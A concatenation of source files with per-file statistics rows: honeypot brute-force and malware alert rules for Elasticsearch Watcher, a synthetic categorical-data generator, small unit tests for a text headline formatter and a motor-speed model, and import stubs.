'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **HTTP Brute Force Alert:** \n '
'**{{ctx.payload.hits.total}}** **failed login attempts** was/were registered in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
# FTP brute force alert
self.watcher.put_watch(
id='brute_force_ftp',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'must': [
{'match': {'service': "FTP"}},
{'match': {'successful': "false"}}],
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}}}}}}}},
# Search for at least 100 logs matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 100}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **FTP Brute Force Alert:** \n '
'**{{ctx.payload.hits.total}}** **failed login attempts** was/were registered in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
# SSH brute force alert
self.watcher.put_watch(
id='brute_force_ssh',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'must': [
{'match': {'service': "SSH"}},
{'match': {'successful': "false"}}],
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}}}}}}}},
# Search for at least 100 logs matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 100}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **SSH Brute Force Alert:** \n '
'**{{ctx.payload.hits.total}}** **failed login attempts** was/were registered in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
# Malware alert
self.watcher.put_watch(
id='malware_alerts',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}},
'must': [{
'range': {
'percent': {
'gte': 30,
'lte': 100}}}]}}}}}},
# Search for every log matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 0}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **Malware Alert:** \n'
'**{{ctx.payload.hits.total}}** new **malware file(s)** was/were discovered in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
        # Honeytoken alert
self.watcher.put_watch(
id='honeytoken_alerts',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'must': [
{'match': {'successful': "true"}}],
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}}}}}}}},
# Search for every log matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 0}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **Honeytoken Alert:** \n'
'**{{ctx.payload.hits.total}}** **honeytokens** was/were used in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
self.watcher.start()
print('\033[94m'+'Watcher Alerts Complete.'+'\033[0m')
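# Usage sketch (assumptions: an Elasticsearch cluster with X-Pack Watcher
# enabled and a Mattermost incoming-webhook URL):
#   from elasticsearch import Elasticsearch
#   es = Elasticsearch(["http://localhost:9200"])
#   ESWatcher(es, "https://mattermost.example.com/hooks/xyz").put_watch()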
| 45.991632 | 149 | 0.302584 | 646 | 10,992 | 5.086687 | 0.184211 | 0.027389 | 0.042605 | 0.057821 | 0.870663 | 0.870663 | 0.839623 | 0.839623 | 0.828971 | 0.828971 | 0 | 0.016242 | 0.585517 | 10,992 | 238 | 150 | 46.184874 | 0.705004 | 0.070597 | 0 | 0.833333 | 0 | 0.026882 | 0.251938 | 0.037295 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010753 | false | 0 | 0.005376 | 0 | 0.032258 | 0.005376 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c0c8a1ef58cecfdb2e6f04413e4f441a62b7b223 | 17,886 | py | Python | src/script/generate_synthetic_data.py | FumiyukiKato/HDPView | 9e70ec567086375764fb4adf7ecd879947a48b1b | [
"Apache-2.0"
] | null | null | null | src/script/generate_synthetic_data.py | FumiyukiKato/HDPView | 9e70ec567086375764fb4adf7ecd879947a48b1b | [
"Apache-2.0"
] | null | null | null | src/script/generate_synthetic_data.py | FumiyukiKato/HDPView | 9e70ec567086375764fb4adf7ecd879947a48b1b | [
"Apache-2.0"
] | null | null | null | import numpy as np
import pandas as pd
from pathlib import Path
import json
root_dir = Path(__file__).resolve().parent
data_dir = root_dir / "data" / "preprocessed"
data_name = "data.csv"
train_name = "train.csv"
test_name = "test.csv"
domain_name = "domain.json"
config_name = "config.json"
def write_data(config, df, domain, index=None):
dataset_name = config['dataset_name']
dataset_name_dir = data_dir / dataset_name
dataset_name_dir.mkdir(parents=True, exist_ok=True)
if index:
df.to_csv(dataset_name_dir / data_name)
else:
df.to_csv(dataset_name_dir / data_name, index=None)
with (dataset_name_dir / domain_name).open(mode="w") as f:
json.dump(domain, f)
with (dataset_name_dir / config_name).open(mode="w") as f:
json.dump(config, f, indent=4)
def rand_geometric(prng, cardinality, data_size, p=0.05):
    x1 = prng.geometric(p, data_size)
bins = np.linspace(x1.min(), x1.max(), cardinality)
return np.digitize(x1, bins=bins) - 1
def rand_uniform(prng, cardinality, data_size):
return prng.randint(0, cardinality, data_size)
def rand_gauss(prng, cardinality, data_size, loc=0, scale=1):
    x1 = prng.normal(loc=loc, scale=scale, size=data_size)
bins = np.linspace(x1.min(), x1.max(), cardinality)
return np.digitize(x1, bins=bins) - 1
def shuffle_attributes(prng, a, cardinality):
tansform_table = prng.permutation(np.arange(cardinality))
transform = np.frompyfunc(lambda value: tansform_table[value], 1, 1)
return transform(a)
def generate_artificial(schema, seed, data_size=0):
"""
Args:
schema ({str: {str: int, str: str}}): {'column name': {'cardinality': int, 'dist': str, 'shuffle': bool}
ex) {'age': {'cardinality': 10, 'dist': 'uniform', 'shuffle': True}, 'race': {...
"""
prng = np.random.RandomState(seed)
generated_data = {}
domain = {}
for column, item in schema.items():
if item['dist'] == "uniform":
generated_data[column] =rand_uniform(prng, item['cardinality'], data_size)
elif item['dist'] == "geometric":
if item.get('p'):
generated_data[column] = rand_geometric(prng, item['cardinality'], data_size, p=item.get('p'))
else:
generated_data[column] = rand_geometric(prng, item['cardinality'], data_size)
elif item['dist'] == "gauss":
generated_data[column] = rand_gauss(prng, item['cardinality'], data_size)
else:
raise Exception("not found dist: %s" % item['dist'])
if item.get('shuffle'):
generated_data[column] = shuffle_attributes(prng, generated_data[column], item['cardinality'])
domain[column] = item['cardinality']
df = pd.DataFrame(generated_data)
return df, domain
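# Example call with a hypothetical two-attribute schema:
#   df, dom = generate_artificial(
#       {'a': {'cardinality': 10, 'dist': 'gauss'},
#        'b': {'cardinality': 5, 'dist': 'uniform', 'shuffle': True}},
#       seed=0, data_size=1000)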
def generate_sparse_count_table(schema, seed, data_size=0, sparse_rate=0, p=0.0001):
prng = np.random.RandomState(seed)
domain = { column: item['cardinality'] for column, item in schema.items() }
sparse_size = int(domain_num(domain) * sparse_rate)
x1 = prng.geometric(p, data_size-sparse_size)
counts, _ = np.histogram(x1, range=(x1.min(), x1.max()), bins=sparse_size)
counts = counts + 1
# index= random_indices(prng, domain, sparse_size)
index = continuous_indices(domain, sparse_size)
return pd.DataFrame(counts, index=index), domain
def random_indices(prng, domain, size):
unique_indices = set()
index_size = 0
while index_size < size:
index = tuple([ prng.randint(0, cardinality) for cardinality in domain.values() ])
if index in unique_indices:
continue
else:
unique_indices.add(index)
index_size += 1
return pd.Index(list(unique_indices))
def continuous_indices(domain, size):
indices = []
for i in range(size):
        # NOTE: assumes a 10-attribute domain, one digit of str(i).zfill(10) per attribute
        int_indice = [int(j) for j in list(str(i).zfill(10))]
indices.append(tuple(int_indice))
return pd.Index(indices)
def sparse_rate(df, domain):
return len(df.drop_duplicates()) / np.prod(list(domain.values()), dtype=np.float64)
def domain_num(domain):
return np.prod(list(domain.values()), dtype=np.float64)
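# e.g. ten attributes of cardinality 10 give domain_num(domain) == 1e10, so
# data_size = 1e5 distinct records imply a sparse rate of at most 1e-5.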
def save(config):
df, domain = generate_artificial(schema=config['schema'], seed=config['seed'], data_size=config.get('data_size'))
write_data(config, df, domain)
print(domain)
print('domain size: ', domain_num(domain))
print('data size: ', len(df))
print('sparse rate: ', sparse_rate(df, domain))
def save_sparse_data(config):
df, domain = generate_sparse_count_table(schema=config['schema'], seed=config['seed'], data_size=config.get('data_size'), sparse_rate=config.get('sparse_rate'))
write_data(config, df, domain, True)
print(domain)
print('domain size: ', domain_num(domain))
print('data size: ', df.values.sum())
print('df size', len(df))
return df, domain
if __name__ == '__main__':
config = {
'dataset_name': 'geometric-1e2',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e3',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e4',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e5',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e6',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e7',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e8',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e9',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e10',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e12',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
'11': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e11',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e14',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
'11': { 'cardinality': 10, 'dist': 'geometric'},
'12': { 'cardinality': 10, 'dist': 'geometric'},
'13': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e15',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
'11': { 'cardinality': 10, 'dist': 'geometric'},
'12': { 'cardinality': 10, 'dist': 'geometric'},
'13': { 'cardinality': 10, 'dist': 'geometric'},
'14': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e16',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
'11': { 'cardinality': 10, 'dist': 'geometric'},
'12': { 'cardinality': 10, 'dist': 'geometric'},
'13': { 'cardinality': 10, 'dist': 'geometric'},
'14': { 'cardinality': 10, 'dist': 'geometric'},
'15': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'sparse-ct-1e-5',
'seed': 0,
'data_size': 1000000,
'sparse_rate':1e-5,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save_sparse_data(config)
config = {
'dataset_name': 'sparse-ct-5e-6',
'seed': 0,
'data_size': 1000000,
'sparse_rate':5e-6,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save_sparse_data(config)
config = {
'dataset_name': 'sparse-ct-1e-7',
'seed': 0,
'data_size': 1000000,
'sparse_rate':1e-7,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save_sparse_data(config)
config = {
'dataset_name': 'sparse-ct-1e-8',
'seed': 0,
'data_size': 1000000,
'sparse_rate':1e-8,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
df, domain = save_sparse_data(config) | 37.734177 | 164 | 0.501733 | 1,754 | 17,886 | 5.019384 | 0.097491 | 0.240686 | 0.314743 | 0.478419 | 0.748864 | 0.716379 | 0.710473 | 0.705929 | 0.677192 | 0.662313 | 0 | 0.057703 | 0.295594 | 17,886 | 474 | 165 | 37.734177 | 0.641083 | 0.014425 | 0 | 0.642512 | 0 | 0 | 0.299063 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031401 | false | 0 | 0.009662 | 0.007246 | 0.067633 | 0.019324 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c0edf6ae0ecadce7897540336c778885afdf65b3 | 47 | py | Python | attacks/__init__.py | HanxunH/MDAttack | fd4107c857f11385685b6daf0de7a455749528d5 | [
"MIT"
] | 8 | 2021-11-13T10:54:21.000Z | 2021-11-30T08:54:45.000Z | attacks/__init__.py | HanxunH/MDAttack | fd4107c857f11385685b6daf0de7a455749528d5 | [
"MIT"
] | null | null | null | attacks/__init__.py | HanxunH/MDAttack | fd4107c857f11385685b6daf0de7a455749528d5 | [
"MIT"
] | null | null | null | from . import attack_handler
from . import PGD
| 15.666667 | 28 | 0.787234 | 7 | 47 | 5.142857 | 0.714286 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 29 | 23.5 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
23ce3dd6d07975e32632e9c495ac8ccd8e8af421 | 810 | py | Python | test.py | Williamvsd/incomplete_for_students | 01b89a6b11d782b887b5db875fbc03fcd497ff98 | [
"MIT"
] | null | null | null | test.py | Williamvsd/incomplete_for_students | 01b89a6b11d782b887b5db875fbc03fcd497ff98 | [
"MIT"
] | null | null | null | test.py | Williamvsd/incomplete_for_students | 01b89a6b11d782b887b5db875fbc03fcd497ff98 | [
"MIT"
] | null | null | null | import model
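# Smoke test for the differential-drive model: dk() derives the platform's
# linear and rotational speed from the two motor speeds (direct kinematics).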
m = model.Model()
print ("default model: {}".format(m))
print("#### Setting a speed to motor 1 only")
m.m1.speed = 0.1
m.m2.speed = 0.1
print("\n#########\nmodel: {}".format(m))
linear_speed, rotation_speed = m.dk()
print ("linear_speed,={}\nrotational_speed={}".format(linear_speed, rotation_speed))
print("#### Setting opposed speed for both motors")
m.m1.speed = 0.1
m.m2.speed = 0.2
print("\n#########\nmodel: {}".format(m))
linear_speed, rotation_speed = m.dk()
print ("linear_speed,={}\nrotational_speed={}".format(linear_speed, rotation_speed))
print("#### Setting speed2 = 2xspeed1")
m.m1.speed = 0.1
m.m2.speed = 0.2
print("\n#########\nmodel: {}".format(m))
linear_speed, rotation_speed = m.dk()
print ("linear_speed,={}\nrotational_speed={}".format(linear_speed, rotation_speed)) | 30 | 84 | 0.667901 | 122 | 810 | 4.286885 | 0.237705 | 0.189293 | 0.217973 | 0.275335 | 0.778203 | 0.778203 | 0.778203 | 0.778203 | 0.778203 | 0.741874 | 0 | 0.030137 | 0.098765 | 810 | 27 | 85 | 30 | 0.686301 | 0 | 0 | 0.666667 | 0 | 0 | 0.37238 | 0.136868 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0.47619 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
7b6697dc937fd114b1f55c22be81209803c3a76f | 3,840 | py | Python | holiness/tests/test_headline.py | MadaoG/holiness | 5b7b836a9db34379a9ea47293d84f6a3be192e61 | [
"MIT"
] | null | null | null | holiness/tests/test_headline.py | MadaoG/holiness | 5b7b836a9db34379a9ea47293d84f6a3be192e61 | [
"MIT"
] | null | null | null | holiness/tests/test_headline.py | MadaoG/holiness | 5b7b836a9db34379a9ea47293d84f6a3be192e61 | [
"MIT"
] | null | null | null | from unittest import TestCase
import holiness
class TestHeadline(TestCase):
def test_basic_headline(self):
h = holiness.headline("headline")
self.assertTrue(h == "========================== H E A D L I N E ===========================")
def test_headline_width(self):
h = holiness.headline("headline", width=42)
self.assertTrue(h == "=========== H E A D L I N E ============")
def test_headline_uppercase(self):
h = holiness.headline("headline", width=42, uppercase=False)
self.assertTrue(h == "=========== h e a d l i n e ============")
def test_headline_spaces(self):
h = holiness.headline("headline", width=42, nr_spaces=0)
self.assertTrue(h == "=============H E A D L I N E==============")
def test_headline_spaces_max(self):
"""too much nr_spaces should not be ignored"""
h = holiness.headline("headline", width=42, nr_spaces=20)
self.assertTrue(h == "= H E A D L I N E =")
def test_headline_sym(self):
h = holiness.headline("headline", width=42, border="#")
self.assertTrue(h == "#========== H E A D L I N E ===========#")
def test_headline_sym_pair_tuple(self):
h = holiness.headline("headline", width=42, border=(">>", "<<"))
self.assertTrue(h == ">>========= H E A D L I N E ==========<<")
def test_headline_sym_pair_list(self):
h = holiness.headline("headline", width=42, border=["/*", "*/"])
self.assertTrue(h == "/*========= H E A D L I N E ==========*/")
def test_headline_sym_mirror(self):
h = holiness.headline("headline", width=42, border="# ")
self.assertTrue(h == "# ========= H E A D L I N E ========== #")
def test_headline_like_c(self):
h = holiness.headline("headline", width=42, border="/*", char="*")
self.assertTrue(h == "/********** H E A D L I N E ***********/")
def test_headline_char(self):
h = holiness.headline("headline", width=42, char="-")
self.assertTrue(h == "----------- H E A D L I N E ------------")
def test_headline_char_sym(self):
h = holiness.headline("headline", width=42, char="-", border="!")
self.assertTrue(h == "!---------- H E A D L I N E -----------!")
def test_headline_char_sym_equal(self):
h = holiness.headline("headline", width=42, char="-", border="=")
self.assertTrue(h == "=---------- H E A D L I N E -----------=")
def test_headline_spacesym(self):
h = holiness.headline("headline", width=42, spacesym="_")
self.assertTrue(h == "===========__H_E_A_D_L_I_N_E__============")
def test_headline_surround(self):
h = holiness.headline("headline", width=42, surround=True)
self.assertTrue(h ==
"==========================================\n" +
"=========== H E A D L I N E ============\n" +
"=========================================="
)
def test_headline_all(self):
h = holiness.headline(
"headline",
width=42,
surround=True,
border="% ",
char="~",
spacesym="~",
nr_spaces=4,
uppercase=False
)
self.assertTrue(h ==
"% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ %\n" +
"% ~~~~~~~~~~~h~e~a~d~l~i~n~e~~~~~~~~~~~~ %\n" +
"% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ %")
def test_headline_char_multiple(self):
h = holiness.headline("headline", width=42, char="+-")
self.assertTrue(h == "+-+-+-+-+-+ H E A D L I N E +-+-+-+-+-+-")
| 42.197802 | 104 | 0.445313 | 437 | 3,840 | 3.773455 | 0.116705 | 0.072165 | 0.175258 | 0.257732 | 0.858702 | 0.824136 | 0.824136 | 0.756216 | 0.682232 | 0.624015 | 0 | 0.013211 | 0.290365 | 3,840 | 90 | 105 | 42.666667 | 0.591927 | 0.010417 | 0 | 0.057143 | 0 | 0 | 0.289141 | 0.077754 | 0 | 0 | 0 | 0 | 0.242857 | 1 | 0.242857 | false | 0 | 0.028571 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7ba2e8a1acde39e06913ba80d6d0d7a856d824f2 | 14,041 | py | Python | lib/models/condconv.py | CFM-MSG/Code_CDN | b7d21cd4234ef55443dd60d7c48166085f93253c | [
"MIT"
] | 4 | 2022-01-20T13:52:55.000Z | 2022-03-30T08:46:51.000Z | lib/models/condconv.py | CFM-MSG/Code_CDN | b7d21cd4234ef55443dd60d7c48166085f93253c | [
"MIT"
] | 1 | 2022-03-09T07:10:54.000Z | 2022-03-09T07:10:54.000Z | lib/models/condconv.py | CFM-MSG/Code_CDN | b7d21cd4234ef55443dd60d7c48166085f93253c | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.nn.modules.conv import _ConvNd
